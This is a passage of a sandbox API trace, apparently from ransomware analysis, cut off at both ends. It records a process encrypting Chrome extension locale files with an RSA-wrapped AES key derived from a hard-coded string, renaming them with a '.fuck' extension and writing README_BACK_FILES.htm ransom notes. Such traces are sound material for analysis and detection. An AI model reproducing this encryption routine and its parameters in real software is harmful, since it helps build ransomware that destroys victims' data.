KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0258.062] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0258.062] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e7a720) returned 1 [0258.063] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7a720, dwCertEncodingType=0x1, pInfo=0x2e259f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e25a20*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e25a28*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7fe80) returned 1 [0258.063] CryptEncrypt (in: hKey=0x2e7fe80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0258.063] CryptEncrypt (in: hKey=0x2e7fe80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7aad8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e7aad8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0258.063] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e7aad8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e7aad8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0258.064] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xcd, lpOverlapped=0x0) returned 1 [0258.065] CryptEncrypt (in: hKey=0x2e7fe40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xcd, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0258.065] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0258.065] CloseHandle (hObject=0x5d60) returned 1 [0258.066] CloseHandle (hObject=0x5d5c) returned 1 [0258.066] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\tr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\tr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\tr\\messages.json"), bFailIfExists=0) returned 1 [0258.069] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\tr\\messages.json", dwFileAttributes=0x0) returned 1 [0258.070] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\tr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\tr\\messages.json.gsg")) returned 1 [0258.071] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\tr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\tr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\tr\\messages.json.fuck")) returned 1 [0258.072] CryptDestroyHash (hHash=0x2e7fdc0) returned 1 [0258.072] CryptDestroyKey (hKey=0x2e7fe40) returned 1 [0258.072] CryptReleaseContext (hProv=0x2e796a8, dwFlags=0x0) returned 1 [0258.072] FindNextFileA (in: hFindFile=0x2e7ff00, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0258.072] FindClose (in: hFindFile=0x2e7ff00 | out: hFindFile=0x2e7ff00) returned 1 [0258.072] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\tr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\tr\\readme_back_files.htm")) returned 0xffffffff [0258.073] AreFileApisANSI () returned 1 [0258.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0258.073] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\tr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\tr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0258.073] GetFileType (hFile=0x5d50) returned 0x1 [0258.074] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0258.075] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.075] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7ffc0 [0258.076] FindNextFileA (in: hFindFile=0x2e7ffc0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0258.076] FindNextFileA (in: hFindFile=0x2e7ffc0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0258.076] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0258.076] GetLastError () returned 0x0 [0258.076] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\messages.json")) returned 0x20 [0258.077] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\messages.json", dwFileAttributes=0x80) returned 1 [0258.077] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0258.078] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0258.078] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0258.079] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e796a8) returned 1 [0258.081] CryptCreateHash (in: hProv=0x2e796a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0258.081] lstrlenA (lpString="WcJIVquNvpAEukoBQHzQwvMnzMlQm") returned 29 [0258.081] CryptHashData (hHash=0x2e7fbc0, pbData=0x28cb4b8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0258.081] CryptDeriveKey (in: hProv=0x2e796a8, Algid=0x6610, hBaseData=0x2e7fbc0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7fc00) returned 1 [0258.081] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0258.081] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0258.081] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e7a038) returned 1 [0258.082] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7a038, dwCertEncodingType=0x1, pInfo=0x2e240c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e240f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e240f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7fe40) returned 1 [0258.082] CryptEncrypt (in: hKey=0x2e7fe40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0258.082] CryptEncrypt (in: hKey=0x2e7fe40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7a7a8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e7a7a8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0258.082] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e7a7a8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e7a7a8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0258.083] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x115, lpOverlapped=0x0) returned 1 [0258.084] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x115, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x120) returned 1 [0258.084] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x120, lpOverlapped=0x0) returned 1 [0258.084] CloseHandle (hObject=0x5d5c) returned 1 [0258.084] CloseHandle (hObject=0x5d60) returned 1 [0258.085] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\messages.json"), bFailIfExists=0) returned 1 [0258.088] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\messages.json", dwFileAttributes=0x0) returned 1 [0258.089] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\messages.json.gsg")) returned 1 [0258.090] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\messages.json.fuck")) returned 1 [0258.092] CryptDestroyHash (hHash=0x2e7fbc0) returned 1 [0258.092] CryptDestroyKey (hKey=0x2e7fc00) returned 1 [0258.092] CryptReleaseContext (hProv=0x2e796a8, dwFlags=0x0) returned 1 [0258.092] FindNextFileA (in: hFindFile=0x2e7ffc0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0258.092] FindClose (in: hFindFile=0x2e7ffc0 | out: hFindFile=0x2e7ffc0) returned 1 [0258.092] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\readme_back_files.htm")) returned 0xffffffff [0258.092] AreFileApisANSI () returned 1 [0258.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0258.092] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0258.093] GetFileType (hFile=0x5d50) returned 0x1 [0258.093] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0258.094] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0258.094] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fb00 [0258.095] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0258.095] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0258.095] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0258.095] GetLastError () returned 0x0 [0258.095] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\messages.json")) returned 0x20 [0258.095] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\messages.json", dwFileAttributes=0x80) returned 1 [0258.096] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0258.096] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0258.098] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0258.098] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e796a8) returned 1 [0258.102] CryptCreateHash (in: hProv=0x2e796a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0258.102] lstrlenA (lpString="WcJIVquNvpAEukoBQHzQwvMnzMlQm") returned 29 [0258.102] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb328, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0258.102] CryptDeriveKey (in: hProv=0x2e796a8, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7fec0) returned 1 [0258.102] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0258.102] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0258.102] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e79f28) returned 1 [0258.103] CryptImportPublicKeyInfo (in: hCryptProv=0x2e79f28, dwCertEncodingType=0x1, pInfo=0x2e24190*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e241c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e241c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7f900) returned 1 [0258.103] CryptEncrypt (in: hKey=0x2e7f900, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0258.103] CryptEncrypt (in: hKey=0x2e7f900, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e79fb0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e79fb0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0258.103] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e79fb0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e79fb0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0258.104] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x177, lpOverlapped=0x0) returned 1 [0258.105] CryptEncrypt (in: hKey=0x2e7fec0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x177, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x180) returned 1 [0258.105] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x180, lpOverlapped=0x0) returned 1 [0258.105] CloseHandle (hObject=0x5d60) returned 1 [0258.105] CloseHandle (hObject=0x5d5c) returned 1 [0258.106] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ur\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user 